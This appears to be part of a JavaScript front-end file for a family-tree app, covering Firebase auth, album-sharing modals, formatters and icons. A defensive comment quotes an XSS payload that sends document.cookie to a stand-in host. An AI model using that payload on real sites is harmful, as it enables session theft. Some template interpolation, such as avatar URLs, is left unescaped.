        import { apiFetch, configureApi } from './services/api.js';
        // Firebase v9+ modular imports. Migrated from v8 compat CDN loads
        // on 2026-08-29 as the foundation for the Capacitor Android wrap —
        // bundled Firebase is required for offline-first cold start.
        // firebase.js runs the SDK init synchronously on module import
        // and exports the ready-to-use auth + db + provider singletons.
        import {
            auth,
            db,
            googleProvider,
            facebookProvider,
            useRedirect,
            consumeRedirectResult,
        } from './services/firebase.js';
        import {
            onAuthStateChanged,
            onIdTokenChanged,
            signInWithEmailAndPassword,
            createUserWithEmailAndPassword,
            signInWithPopup,
            signInWithRedirect,
            signOut,
            sendPasswordResetEmail,
            applyActionCode,
            verifyPasswordResetCode,
            confirmPasswordReset,
            fetchSignInMethodsForEmail,
            // 2026-10-09 Path A fix: Session 1 v9 migration grep caught
            // the 25 `firebase.*.X(...)` namespaced call sites but missed
            // `userCredential.user.updateProfile(...)` and `.sendEmailVerification()`
            // which are METHOD calls on the User object (v8 shape), not
            // `firebase.*` namespaced. In v9 modular, both became top-level
            // free functions: updateProfile(user, {...}) + sendEmailVerification(user).
            // Both missed sites throw TypeError inside handleSignup, propagating
            // to the catch block BEFORE /invites/accept gets called — exact root
            // cause of §D.1 2026-10-09 incident.
            updateProfile,
            sendEmailVerification,
        } from 'firebase/auth';
        import {
            collection,
            doc,
            query,
            where,
            orderBy,
            onSnapshot,
            updateDoc,
            serverTimestamp,
        } from 'firebase/firestore';
        // AuthChannel abstraction — pluggable OTP delivery. Currently
        // 'sms' via Firebase phone auth; 'whatsapp' stub pending Meta
        // business verification. Callers must go through getAuthChannel
        // (never import SmsAuthChannel / WhatsAppAuthChannel directly)
        // so the eventual channel flip is a config change, not a code
        // change. See src/services/auth-channels.js.
        import { getAuthChannel } from './services/auth-channels.js';
        // Session 2b Phase 1: Capacitor Android native shell. Every hook is
        // isNative()-gated internally, so this import is safe in the web bundle
        // too (all native code paths short-circuit on non-Capacitor environments).
        import { initNativeShell, dismissSplashOnReady } from './services/native-shell.js';

        const API_BASE_URL = window.EBIWAWA_CONFIG.API_BASE_URL;

        // Feature flags gating UI entry points. Backend handlers stay in place
        // so flipping a flag to true re-exposes the feature without a re-deploy
        // of server code. Values reflect the invite-only launch scope per
        // claude-ebi/LAUNCH-SCOPE.md (2026-05-12 freeze).
        const FEATURES = {
            captionSuggestions:    false, // CUT
            storyGenerator:        false, // Deferred to Phase 2
            documentOCR:           false, // Deferred (with Documents)
            audioTranscription:    false, // Deferred to Phase 2
            documents:             false, // Deferred to Phase 2
            calendarEventCreation: false, // Deferred — read-only calendar view only
            facebookSignIn:        false, // Hidden during invite-only launch (per design review 2026-05-21).
                                          // Wiring kept intact — flip to true to re-expose the button.
            signupTabVisible:      true,  // 2026-10-19 launch day flip (committed on
                                          // launch-day-cta-swap branch 2026-10-14). Sign Up tab
                                          // visible for public signup. Pre-launch value: false.
            requireInvite:         false, // 2026-10-19 launch day flip. Signup form no longer
                                          // requires ?invite=TOKEN. Pair with backend
                                          // REQUIRE_INVITE_FOR_SIGNUP=false. Pre-launch value: true.
            phoneSignIn:           false, // 2026-10-25 flipped back OFF pre-announce. "Continue
                                          // with phone" button was rendered on signed-out AuthPage
                                          // but handler openPhoneSignupModal() operates on DOM
                                          // elements (phone-step-phone etc.) that only exist
                                          // inside PhoneSignupModal, which is only injected into
                                          // #modal-container on DashboardPage render — meaning the
                                          // button rendered on AuthPage opened nothing on click.
                                          // Discovered during F3.3 smoke 2026-10-25T18:40Z.
                                          // Backend phone-auth config (Session 1.5 + Identity
                                          // Platform phoneNumber.enabled=true) stays live; this
                                          // just hides the broken frontend affordance. Re-flip
                                          // true after P1-10256 modal-render-site fix ships.
            authChannel:           'sms', // 'sms' (Firebase phone auth, live) or 'whatsapp' (stub).
                                          // Read by services/auth-channels.js::getAuthChannel().
        };

        const appState = {
            currentUser: null,  // Firebase user object
            currentUserNeo4jId: null,  // Neo4j user ID
            authToken: null,  // Firebase ID token
            isAuthenticated: false,
            hasTree: false,
            currentView: 'family-tree-view',
            currentTree: null,  // Full tree object with name, etc.
            currentTreeId: null,
            pendingTreeRequests: [],  // From /me — populated for users awaiting acceptance
            personsInTree: [],
            calendars: [],
            selectedCalendarId: null,
            conversations: [],
            selectedConversationId: null,
            firestoreUnsubscribe: null,
            // Prompt 17: persistent Firestore onSnapshot on the user's
            // conversations, feeding the global chat unread dot.
            // Deliberately NOT reusing firestoreUnsubscribe — that one
            // gets torn down on every navigateToView; the unread
            // listener must span the whole authenticated session.
            unreadUnsubscribe: null,
        };

        // Wire api.js to read the current auth token from appState lazily and
        // sign the user out on 401. logout + fetchCurrentUser are hoisted so
        // referencing them here is fine.
        //
        // Two self-heal hooks added 2026-07-23 for the idle-tab stale-state
        // class:
        //   refreshAuthToken: force-refreshes the Firebase ID token via
        //     getIdToken(true), returning the new token. api.js retries the
        //     failed request once with it before falling back to
        //     onUnauthorized. Handles the case where appState.authToken is
        //     stale (Firebase's background refresh missed the window while
        //     the tab was inactive).
        //   refreshCurrentUser: refetches /me and returns the fresh
        //     neo4jUserId. api.js uses it to rewrite the URL's
        //     /users/<id>/... segment and retry once. Handles the case
        //     where appState.currentUserNeo4jId got out of sync with the
        //     signed-in Firebase token (BFCache restore, multi-tab
        //     interference) — surfaces as a 403 "Unauthorized access" on
        //     Photos/Chat/etc. that previously required a hard page refresh.
        configureApi({
            getAuthToken: () => appState.authToken,
            refreshAuthToken: async () => {
                const user = auth.currentUser;
                if (!user) return null;
                try {
                    const fresh = await user.getIdToken(true); // force-refresh
                    appState.authToken = fresh;
                    return fresh;
                } catch (e) {
                    console.warn('refreshAuthToken failed:', e);
                    return null;
                }
            },
            refreshCurrentUser: async () => {
                try {
                    const res = await fetchCurrentUser(true);
                    return res && res.neo4jUserId != null ? res.neo4jUserId : appState.currentUserNeo4jId;
                } catch (e) {
                    console.warn('refreshCurrentUser failed:', e);
                    return appState.currentUserNeo4jId;
                }
            },
            onUnauthorized: () => logout(),
        });

        // ---- Security utilities ----
        //
        // B40 (item 19): every user-controlled string that flows into an
        // innerHTML / template-literal interpolation must pass through this.
        // Without it, a Person.first_name like
        //   <img src=x onerror="fetch('https://evil/'+document.cookie)">
        // executes in every viewer's browser. We were previously defining
        // escapeHtml *locally* in a handful of functions (B22 inbox, Q4
        // chips, B38 orphan search); promoting it here makes the protection
        // global and removes the per-site definitions.
        //
        // Rule of thumb when editing app.js: if `${...}` sits inside an HTML
        // template literal AND the interpolated value comes from anywhere
        // outside this file's own constants, wrap it: `${escapeHtml(x)}`.
        // Numbers, booleans, and known-safe enums (e.g. relationship_type
        // values that are already enum-validated) don't need it.
        const escapeHtml = (s) => String(s ?? '').replace(/[&<>"']/g, (c) => ({
            '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
        }[c]));
        // Expose for inline-handler scopes that need it.
        window.escapeHtml = escapeHtml;

        // Data-attribute-driven album card handlers. Album cards write the
        // title once as data-album-title="${escapeHtml(title)}" and never
        // interpolate it into a JS string literal — this sidesteps the
        // dual-context escaping mess (HTML attribute + JS string) that
        // caused ' and " in album titles to break inline onclick handlers.
        // Both helpers walk up to the nearest [data-album-id] wrapper so
        // they work whether the click is on the outer div or a child.
        function openAlbumFromEl(el) {
            const wrapper = el && el.closest && el.closest('[data-album-id]');
            if (!wrapper) return;
            const albumId = parseInt(wrapper.dataset.albumId, 10);
            if (Number.isNaN(albumId)) return;
            const albumTitle = wrapper.dataset.albumTitle || '';
            const albumDescription = wrapper.dataset.albumDescription || '';
            const albumIsDefault = wrapper.dataset.albumIsDefault === 'true';
            navigateToView('album-detail-view', {
                albumId, albumTitle, albumDescription, albumIsDefault,
            });
        }
        function deleteAlbumFromEl(el, event) {
            if (event && typeof event.stopPropagation === 'function') event.stopPropagation();
            const wrapper = el && el.closest && el.closest('[data-album-id]');
            if (!wrapper) return;
            const albumId = parseInt(wrapper.dataset.albumId, 10);
            if (Number.isNaN(albumId)) return;
            const albumTitle = wrapper.dataset.albumTitle || '';
            deleteAlbum(albumId, albumTitle);
        }
        // F21 rename affordance. Reads id/title/description from the nearest
        // [data-album-id] ancestor (album card OR detail-page header shell),
        // prefills the RenameAlbum modal via DOM value assignment (never
        // interpolated into JS strings — the Prompt 4 escape-hygiene rule).
        // Album id lives on the form's dataset so handleRenameAlbum can read
        // it without a module-level variable.
        function openRenameAlbumFromEl(el, event) {
            if (event && typeof event.stopPropagation === 'function') event.stopPropagation();
            const wrapper = el && el.closest && el.closest('[data-album-id]');
            if (!wrapper) return;
            const albumId = parseInt(wrapper.dataset.albumId, 10);
            if (Number.isNaN(albumId)) return;
            const albumTitle = wrapper.dataset.albumTitle || '';
            const albumDescription = wrapper.dataset.albumDescription || '';
            const form = document.getElementById('rename-album-form');
            const titleInput = document.getElementById('rename-album-title');
            const descInput = document.getElementById('rename-album-description');
            const errorDiv = document.getElementById('rename-album-error');
            if (form) form.dataset.albumId = String(albumId);
            if (titleInput) titleInput.value = albumTitle;
            if (descInput) descInput.value = albumDescription;
            if (errorDiv) errorDiv.textContent = '';
            openModal('rename-album-modal');
        }
        // Prompt 15: share affordance. Walks up to the nearest
        // [data-album-id] ancestor (card or AlbumDetail wrapper), reads
        // id + title, hands off to openShareAlbumModal which fetches
        // members + existing shares and prefills the UI.
        function openShareAlbumFromEl(el, event) {
            if (event && typeof event.stopPropagation === 'function') event.stopPropagation();
            const wrapper = el && el.closest && el.closest('[data-album-id]');
            if (!wrapper) return;
            const albumId = parseInt(wrapper.dataset.albumId, 10);
            if (Number.isNaN(albumId)) return;
            const albumTitle = wrapper.dataset.albumTitle || '';
            openShareAlbumModal(albumId, albumTitle);
        }
        window.openAlbumFromEl = openAlbumFromEl;
        window.deleteAlbumFromEl = deleteAlbumFromEl;
        window.openRenameAlbumFromEl = openRenameAlbumFromEl;
        window.openShareAlbumFromEl = openShareAlbumFromEl;

        // Prompt 15: ShareAlbumModal open + save handlers. State lives on
        // window._ebwShareModalState (initialShares + desiredShares
        // Maps keyed by userId) so navigation between rows updates the
        // desired-state, and Save diffs desired vs initial into three
        // action sets: creates, updates, deletes.
        window._ebwShareModalState = null;

        async function openShareAlbumModal(albumId, albumTitle) {
            const modal = document.getElementById('share-album-modal');
            if (!modal) return;
            const card = modal.querySelector('[data-album-id]');
            const list = document.getElementById('share-album-list');
            const subtitle = document.getElementById('share-album-subtitle');
            const errorDiv = document.getElementById('share-album-error');
            const saveBtn = document.getElementById('share-album-save-btn');
            if (!card || !list || !saveBtn) return;

            card.dataset.albumId = String(albumId);
            if (subtitle) subtitle.textContent = albumTitle || '';
            if (errorDiv) { errorDiv.textContent = ''; errorDiv.classList.add('hidden'); }
            saveBtn.disabled = false;
            saveBtn.textContent = 'Save';
            list.innerHTML = `<p class="text-sm text-gray-500 text-center py-8">Loading family members…</p>`;

            // Show modal + body scroll lock.
            modal.classList.remove('hidden');
            document.body.dataset.shareModalSavedOverflow = document.body.style.overflow || '';
            document.body.style.overflow = 'hidden';

            try {
                // Load tree members if not already cached — reuses the
                // same data source as chat's recipient picker.
                if (!appState.treeMembers || appState.treeMembers.length === 0) {
                    await loadTreeMembersForChat();
                }
                const members = (appState.treeMembers || [])
                    .filter(m => m.user && m.user.id !== appState.currentUserNeo4jId);

                // Fetch existing shares.
                const sharesResp = await apiFetch(`${API_BASE_URL}/albums/${albumId}/shares`);
                const initial = new Map();
                (sharesResp.shares || []).forEach(s => initial.set(s.userId, s.role));
                const desired = new Map(initial);

                window._ebwShareModalState = { albumId, initial, desired, members };
                _renderShareModalList();
            } catch (e) {
                console.error('Error loading share modal:', e);
                list.innerHTML = `<p class="text-sm text-red-600 text-center py-8">Couldn't load family members. ${escapeHtml(e.message || '')}</p>`;
            }
        }

        function _renderShareModalList() {
            const state = window._ebwShareModalState;
            const list = document.getElementById('share-album-list');
            if (!state || !list) return;
            const rows = state.members.map(m => {
                const uid = m.user.id;
                const name = m.user.name || m.user.email || 'Unknown';
                const initials = nameInitials(name);
                const role = state.desired.get(uid) || null; // null | 'viewer' | 'contributor'
                return `
                    <div class="flex items-center gap-3 px-2 py-2 border-b border-gray-100 last:border-0" data-share-row data-user-id="${uid}">
                        <div class="flex items-center justify-center w-9 h-9 rounded-full bg-gradient-to-br from-primary to-purple-600 text-white text-sm font-semibold flex-shrink-0">
                            ${m.user.avatarSignedUrl ?
                                `<img src="${m.user.avatarSignedUrl}" alt="${escapeHtml(name)}" class="w-full h-full object-cover rounded-full" onerror="_imgFallback(this, 'avatar', {initials: '${initials.replace(/'/g, "\\'")}'})">` :
                                escapeHtml(initials)}
                        </div>
                        <div class="flex-1 min-w-0">
                            <p class="text-sm font-medium text-gray-800 truncate">${escapeHtml(name)}</p>
                        </div>
                        <div class="flex items-center gap-1 flex-shrink-0" role="radiogroup" aria-label="Access level for ${escapeHtml(name)}">
                            <button type="button"
                                onclick="setShareRoleForUser(${uid}, null)"
                                class="ebw-share-role-btn px-2 py-1 text-xs rounded-md ${role === null ? 'bg-gray-800 text-white' : 'bg-gray-100 text-gray-700 hover:bg-gray-200'}"
                                aria-pressed="${role === null}">Not shared</button>
                            <button type="button"
                                onclick="setShareRoleForUser(${uid}, 'viewer')"
                                class="ebw-share-role-btn px-2 py-1 text-xs rounded-md ${role === 'viewer' ? 'bg-primary text-white' : 'bg-gray-100 text-gray-700 hover:bg-gray-200'}"
                                aria-pressed="${role === 'viewer'}">Viewer</button>
                            <button type="button"
                                onclick="setShareRoleForUser(${uid}, 'contributor')"
                                class="ebw-share-role-btn px-2 py-1 text-xs rounded-md ${role === 'contributor' ? 'bg-blue-600 text-white' : 'bg-gray-100 text-gray-700 hover:bg-gray-200'}"
                                aria-pressed="${role === 'contributor'}">Contributor</button>
                        </div>
                    </div>
                `;
            }).join('');
            list.innerHTML = `
                <div class="flex items-center justify-between gap-3 px-2 py-3 border-b border-gray-200 bg-gray-50 sticky top-0">
                    <div class="flex-1 min-w-0">
                        <p class="text-sm font-semibold text-gray-800">Everyone in my family</p>
                        <p class="text-xs text-gray-500">Sets all rows to Viewer — you can adjust individually below.</p>
                    </div>
                    <button type="button" onclick="setShareRoleForAll('viewer')"
                        class="px-3 py-1 text-xs font-semibold rounded-md bg-primary text-white hover:bg-opacity-90 flex-shrink-0">
                        Share with all
                    </button>
                </div>
                ${state.members.length === 0
                    ? `<p class="text-sm text-gray-500 text-center py-8">No other family members yet.</p>`
                    : rows}
            `;
        }

        function setShareRoleForUser(userId, role) {
            const state = window._ebwShareModalState;
            if (!state) return;
            if (role === null) {
                state.desired.delete(userId);
            } else {
                state.desired.set(userId, role);
            }
            _renderShareModalList();
        }

        function setShareRoleForAll(role) {
            const state = window._ebwShareModalState;
            if (!state || !role) return;
            state.members.forEach(m => state.desired.set(m.user.id, role));
            _renderShareModalList();
        }

        function closeShareAlbumModal() {
            const modal = document.getElementById('share-album-modal');
            if (modal) modal.classList.add('hidden');
            window._ebwShareModalState = null;
            if ('shareModalSavedOverflow' in document.body.dataset) {
                document.body.style.overflow = document.body.dataset.shareModalSavedOverflow || '';
                delete document.body.dataset.shareModalSavedOverflow;
            }
        }

        async function handleSaveAlbumShares() {
            const state = window._ebwShareModalState;
            const saveBtn = document.getElementById('share-album-save-btn');
            const errorDiv = document.getElementById('share-album-error');
            if (!state || !saveBtn) return;

            const { albumId, initial, desired } = state;

            // Diff: desired-only = create, changed-role = update
            // (same POST endpoint since it upserts), removed-from-desired
            // = delete.
            const upserts = []; // {userId, role}
            const deletes = []; // userId
            desired.forEach((role, userId) => {
                if (initial.get(userId) !== role) upserts.push({ userId, role });
            });
            initial.forEach((_, userId) => {
                if (!desired.has(userId)) deletes.push(userId);
            });

            if (upserts.length === 0 && deletes.length === 0) {
                closeShareAlbumModal();
                return;
            }

            saveBtn.disabled = true;
            saveBtn.textContent = 'Saving…';
            if (errorDiv) { errorDiv.textContent = ''; errorDiv.classList.add('hidden'); }

            const failures = [];
            for (const u of upserts) {
                try {
                    await apiFetch(`${API_BASE_URL}/albums/${albumId}/shares`, {
                        method: 'POST',
                        body: { userId: u.userId, role: u.role },
                    });
                } catch (e) {
                    failures.push(`Share to user ${u.userId}: ${e.message || 'failed'}`);
                }
            }
            for (const uid of deletes) {
                try {
                    await apiFetch(`${API_BASE_URL}/albums/${albumId}/shares/${uid}`, { method: 'DELETE' });
                } catch (e) {
                    failures.push(`Revoke from user ${uid}: ${e.message || 'failed'}`);
                }
            }

            if (failures.length === 0) {
                closeShareAlbumModal();
                _ebwToast('Sharing updated');
                return;
            }

            saveBtn.disabled = false;
            saveBtn.textContent = 'Retry';
            if (errorDiv) {
                errorDiv.textContent = failures.length === 1
                    ? failures[0]
                    : `${failures.length} of ${upserts.length + deletes.length} changes failed. First: ${failures[0]}`;
                errorDiv.classList.remove('hidden');
            }
        }
        window.openShareAlbumModal = openShareAlbumModal;
        window.closeShareAlbumModal = closeShareAlbumModal;
        window.setShareRoleForUser = setShareRoleForUser;
        window.setShareRoleForAll = setShareRoleForAll;
        window.handleSaveAlbumShares = handleSaveAlbumShares;

        // ---- Pre-launch polish wave: formatters ----
        // Relative-time formatter for feed/comment timestamps (F23).
        // Under 60s → "just now"; then Xm/Xh/Xd up to 7 days; then short
        // date ("Jul 18"). Consumers pair with formatFullTimestamp on a
        // title attribute so the exact locale time is on hover.
        function formatRelativeTime(ts) {
            if (!ts) return '';
            const d = new Date(ts);
            if (isNaN(d.getTime())) return '';
            const diff = Math.max(0, Date.now() - d.getTime());
            const s = Math.floor(diff / 1000);
            if (s < 60) return 'just now';
            const m = Math.floor(s / 60);
            if (m < 60) return `${m}m`;
            const h = Math.floor(m / 60);
            if (h < 24) return `${h}h`;
            const days = Math.floor(h / 24);
            if (days < 7) return `${days}d`;
            return d.toLocaleDateString(undefined, { month: 'short', day: 'numeric' });
        }
        function formatFullTimestamp(ts) {
            if (!ts) return '';
            const d = new Date(ts);
            if (isNaN(d.getTime())) return '';
            return d.toLocaleString();
        }
        window.formatRelativeTime = formatRelativeTime;
        window.formatFullTimestamp = formatFullTimestamp;

        // Single source of truth for person dates + locations across the list,
        // tree, search results, and person-detail surfaces. Per the brief's
        // date-format table. Returns an HTML string (already-escaped) so it
        // can be interpolated directly into card templates.
        function formatPersonDates(person) {
            if (!person) return '';
            const by = person.birth_year;
            const dy = person.death_year;
            const isDeceased = person.is_alive === false || person.isAlive === false || dy != null;
            if (by && dy) {
                // En-dash, deceased range
                return `${by} – ${dy}`;
            }
            if (by) {
                return `b. ${by}`;
            }
            if (dy) {
                return `d. ${dy}`;
            }
            return `<span class="ebw-card-dates-unknown">Dates unknown</span>`;
        }

        // Compact location: "City, REGION". REGION = US state abbrev (passes
        // through if already 2 chars) or 2-letter ISO country code (passes
        // through if already 2 chars). For other inputs, uppercases the
        // last segment after the last comma.
        function formatPersonLocation(person) {
            if (!person) return '';
            const raw = (person.birth_place || person.current_location || '').trim();
            if (!raw) return '';
            const parts = raw.split(',').map(s => s.trim()).filter(Boolean);
            if (parts.length === 1) return parts[0];
            const city = parts[0];
            const last = parts[parts.length - 1];
            // If the last segment looks like a 2-letter code already, keep it.
            // Otherwise uppercase the first 2 chars (e.g. "Maryland" → "MA"
            // is wrong but "MD" stays "MD"). We don't try to map state names
            // to codes — that's a future enhancement; for now just keep the
            // segment as-is when it's >2 chars.
            const region = last.length <= 2 ? last.toUpperCase() : last;
            return `${city}, ${region}`;
        }

        // Avatar: use the person's profile photo if available, else initials
        // on a heritage-palette background. The mockup uses different bg
        // colors per person; for v1 we use a deterministic hash so the
        // same person gets the same colour across renders.
        function personInitials(person) {
            const f = (person.first_name || '').trim();
            const l = (person.last_name || '').trim();
            const i1 = f.charAt(0).toUpperCase();
            const i2 = l.charAt(0).toUpperCase();
            return (i1 + i2) || '?';
        }
        function personAvatarBg(person) {
            // Heritage palette pool. RIP gets the muted brown.
            const isDeceased = person.is_alive === false || person.isAlive === false || person.death_year != null;
            if (isDeceased) return 'var(--ebw-avatar-rip)';
            const pool = ['#E89234', '#C66E1F', '#6B5947', '#B0A38B', '#D8CFC0'];
            const seed = String(person.id || person.first_name || 'x').split('').reduce((a, c) => a + c.charCodeAt(0), 0);
            return pool[seed % pool.length];
        }
        // Avatar text colour: light bg → dark text, dark bg → white text.
        function personAvatarColor(person) {
            const bg = personAvatarBg(person);
            return bg === '#D8CFC0' ? '#6B5947' : '#FFFFFF';
        }

        // ---- Phase 3: per-profile privacy ----
        // Central helper. Returns true if `field` is visible to the viewer for
        // the given `person`. Owners always see all fields on their own Person;
        // viewers see all fields on `visible` Persons; viewers see only `name`
        // and `relationship` on `private` Persons. The helper is field-oriented
        // (not viewer-oriented) so callers can gate individual UI slots
        // uniformly across list / tree / detail / search / feed / photos / chat.
        //
        // Fields recognised by v1:
        //   'name'          — always visible
        //   'relationship'  — always visible (roles + relation lines carry context, not PII)
        //   'dates'         — birth/death year
        //   'location'      — birth place, current location, hometown
        //   'photo'         — profile photo (falls back to initials avatar when hidden)
        //   'bio'           — free-text biography
        //   'occupation'    — job / role at time of tree
        //   'contact'       — email / phone
        //   'trust'         — verification badges + Trust Score
        //
        // Deceased Persons: if a controller (Person's creator or tree creator)
        // wants to see their controlled Person's data unfiltered, they must be
        // identified by `viewerControlsDeceased`. That signal comes from the
        // Person-detail path only — everywhere else, deceased-and-private
        // renders the private treatment same as living-and-private.
        function personIsPrivate(person) {
            return person && person.privacy_mode === 'private';
        }
        // R1 (resource access) frontend mirror of backend assert_tree_member.
        // Returns true iff the viewer has a MANAGES edge (any role: creator /
        // admin / member) to the tree. GET /users/<id>/trees returns only
        // trees the viewer MANAGES, so appState.myTrees membership is the
        // authoritative signal. Any UI affordance gating a tree-scoped
        // action must use this helper (not isOwner, not isCreatorOfDeceased,
        // not a bespoke MANAGES role list) — the frontend must not run a
        // stricter authorization model than the backend. See ARCHITECTURE.md
        // §4.5 R1 for the two-layer model (resource access vs field privacy).
        function _viewerIsTreeMember(treeId) {
            return Array.isArray(appState.myTrees)
                && appState.myTrees.some(t => t && t.tree && t.tree.id === treeId);
        }
        // Two-letter initials from a full name — used everywhere a small
        // circular avatar renders a name-derived placeholder. Falls back to
        // the first character if only one word is present. Kept separate from
        // personInitials(person) because feed/chat carry User-node names as a
        // plain string, not a Person object.
        // Tier 2 of the How-To stack. Renders a small ⓘ info glyph that,
        // when clicked, shows a popover with one line of copy + a "Learn
        // more" link that opens the Tier 3 help drawer. Placed next to
        // features whose purpose isn't obvious from the label — Perspective
        // toggle, Focused view, Rename tree, Privacy modes, + Connect to me.
        //
        // Never auto-fires. Users pull; we don't push.
        // ---- Tabler outline icons ----
        // Warm-neutral #6B5947 default via .ebw-icon; #C66E1F accent when
        // a surrounding surface adds an .active override (see main.css).
        // Standard Tabler v3 outline paths, 24-viewBox, 2px stroke, round
        // linecap/join, currentColor. Call sites specify sizes:
        //   nav chrome: 18px (default)
        //   inline with text: 16px
        //   compact (badges, dense buttons): 14px
        const _TABLER_ICON_PATHS = {
            home: '<path d="M5 12l-2 0l9 -9l9 9l-2 0" /><path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" /><path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />',
            users: '<path d="M9 7m-4 0a4 4 0 1 0 8 0a4 4 0 1 0 -8 0" /><path d="M3 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" /><path d="M16 3.13a4 4 0 0 1 0 7.75" /><path d="M21 21v-2a4 4 0 0 0 -3 -3.85" />',
            user: '<path d="M8 7a4 4 0 1 0 8 0a4 4 0 0 0 -8 0" /><path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />',
            'user-circle': '<path d="M12 12m-9 0a9 9 0 1 0 18 0a9 9 0 1 0 -18 0" /><path d="M12 10m-3 0a3 3 0 1 0 6 0a3 3 0 1 0 -6 0" /><path d="M6.168 18.849a4 4 0 0 1 3.832 -2.849h4a4 4 0 0 1 3.834 2.855" />',
            photo: '<path d="M15 8h.01" /><path d="M3 6a3 3 0 0 1 3 -3h12a3 3 0 0 1 3 3v12a3 3 0 0 1 -3 3h-12a3 3 0 0 1 -3 -3v-12z" /><path d="M3 16l5 -5c.928 -.893 2.072 -.893 3 0l5 5" /><path d="M14 14l1 -1c.928 -.893 2.072 -.893 3 0l3 3" />',
            camera: '<path d="M5 7h1a2 2 0 0 0 2 -2a1 1 0 0 1 1 -1h6a1 1 0 0 1 1 1a2 2 0 0 0 2 2h1a2 2 0 0 1 2 2v9a2 2 0 0 1 -2 2h-14a2 2 0 0 1 -2 -2v-9a2 2 0 0 1 2 -2" /><path d="M9 13a3 3 0 1 0 6 0a3 3 0 0 0 -6 0" />',
            'message-circle': '<path d="M3 20l1.3 -3.9c-2.324 -3.437 -1.426 -7.872 2.1 -10.374c3.526 -2.501 8.59 -2.296 11.845 .48c3.255 2.777 3.695 7.266 1.029 10.501c-2.666 3.235 -7.615 4.215 -11.574 2.293l-4.7 1" />',
            calendar: '<path d="M4 5m0 2a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v12a2 2 0 0 1 -2 2h-12a2 2 0 0 1 -2 -2z" /><path d="M16 3v4" /><path d="M8 3v4" /><path d="M4 11h16" /><path d="M11 15h1" /><path d="M12 15v3" />',
            heart: '<path d="M19.5 12.572l-7.5 7.428l-7.5 -7.428a5 5 0 1 1 7.5 -6.566a5 5 0 1 1 7.5 6.572" />',
            hearts: '<path d="M8.243 6a4.24 4.24 0 0 1 3 1.257l.757 .743l.75 -.75a4.243 4.243 0 1 1 6 6l-6.75 6.75l-6.75 -6.75a4.243 4.243 0 0 1 3 -7.25z" /><path d="M19 3.34c1 1.2 1.5 2.7 1.5 4.16" />',
            search: '<path d="M10 10m-7 0a7 7 0 1 0 14 0a7 7 0 1 0 -14 0" /><path d="M21 21l-6 -6" />',
            inbox: '<path d="M4 4m0 2a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v12a2 2 0 0 1 -2 2h-12a2 2 0 0 1 -2 -2z" /><path d="M4 13h3l3 3h4l3 -3h3" />',
            mail: '<path d="M3 7a2 2 0 0 1 2 -2h14a2 2 0 0 1 2 2v10a2 2 0 0 1 -2 2h-14a2 2 0 0 1 -2 -2v-10z" /><path d="M3 7l9 6l9 -6" />',
            'file-text': '<path d="M14 3v4a1 1 0 0 0 1 1h4" /><path d="M17 21h-10a2 2 0 0 1 -2 -2v-14a2 2 0 0 1 2 -2h7l5 5v11a2 2 0 0 1 -2 2z" /><path d="M9 9l1 0" /><path d="M9 13l6 0" /><path d="M9 17l6 0" />',
            tree: '<path d="M12 13l-2 -2" /><path d="M12 12l2 -2" /><path d="M12 21v-13" /><path d="M9.884 5.084c1.918 -1.999 3.309 -3.084 3.976 -3.084c.667 0 2.058 1.085 3.976 3.084c1.918 1.999 4.076 4.978 4.076 7.416c0 4.126 -3.582 7.5 -8 7.5c-4.418 0 -8 -3.374 -8 -7.5c0 -2.438 2.054 -5.417 4.076 -7.416z" />',
            download: '<path d="M4 17v2a2 2 0 0 0 2 2h12a2 2 0 0 0 2 -2v-2" /><path d="M7 11l5 5l5 -5" /><path d="M12 4l0 12" />',
            upload: '<path d="M4 17v2a2 2 0 0 0 2 2h12a2 2 0 0 0 2 -2v-2" /><path d="M7 9l5 -5l5 5" /><path d="M12 4l0 12" />',
            trash: '<path d="M4 7l16 0" /><path d="M10 11l0 6" /><path d="M14 11l0 6" /><path d="M5 7l1 12a2 2 0 0 0 2 2h8a2 2 0 0 0 2 -2l1 -12" /><path d="M9 7v-3a1 1 0 0 1 1 -1h4a1 1 0 0 1 1 1v3" />',
            'door-exit': '<path d="M13 12v.01" /><path d="M3 21h18" /><path d="M5 21v-16a2 2 0 0 1 2 -2h7.5m2.5 10.5v7.5" /><path d="M14 7h7m-3 -3l3 3l-3 3" />',
            reload: '<path d="M19.933 13.041a8 8 0 1 1 -9.925 -8.788c3.899 -1 7.935 1.007 9.425 4.747" /><path d="M20 4v5h-5" />',
            notes: '<path d="M5 3m0 2a2 2 0 0 1 2 -2h10a2 2 0 0 1 2 2v14a2 2 0 0 1 -2 2h-10a2 2 0 0 1 -2 -2z" /><path d="M9 7l6 0" /><path d="M9 11l6 0" /><path d="M9 15l4 0" />',
            clock: '<path d="M12 12m-9 0a9 9 0 1 0 18 0a9 9 0 1 0 -18 0" /><path d="M12 7v5l3 3" />',
            cake: '<path d="M3 20h18v-8a3 3 0 0 0 -3 -3h-12a3 3 0 0 0 -3 3v8z" /><path d="M3 14.803c.312 .135 .654 .204 1 .197a2.4 2.4 0 0 0 2 -1a2.4 2.4 0 0 1 2 -1a2.4 2.4 0 0 1 2 1a2.4 2.4 0 0 0 2 1a2.4 2.4 0 0 0 2 -1a2.4 2.4 0 0 1 2 -1a2.4 2.4 0 0 1 2 1a2.4 2.4 0 0 0 2 1c.35 .007 .692 -.062 1 -.197" /><path d="M12 4l0 5" /><path d="M10 7l4 0" />',
            candle: '<path d="M10 22h4v-9a1 1 0 0 0 -1 -1h-2a1 1 0 0 0 -1 1v9z" /><path d="M12 4a2 2 0 0 1 2 2v3h-4v-3a2 2 0 0 1 2 -2z" /><path d="M12 2v1" />',
            pin: '<path d="M9 4v6l-2 4v2h10v-2l-2 -4v-6" /><path d="M12 16l0 5" /><path d="M8 4l8 0" />',
            'map-pin': '<path d="M9 11a3 3 0 1 0 6 0a3 3 0 0 0 -6 0" /><path d="M17.657 16.657l-4.243 4.243a2 2 0 0 1 -2.827 0l-4.244 -4.243a8 8 0 1 1 11.314 0z" />',
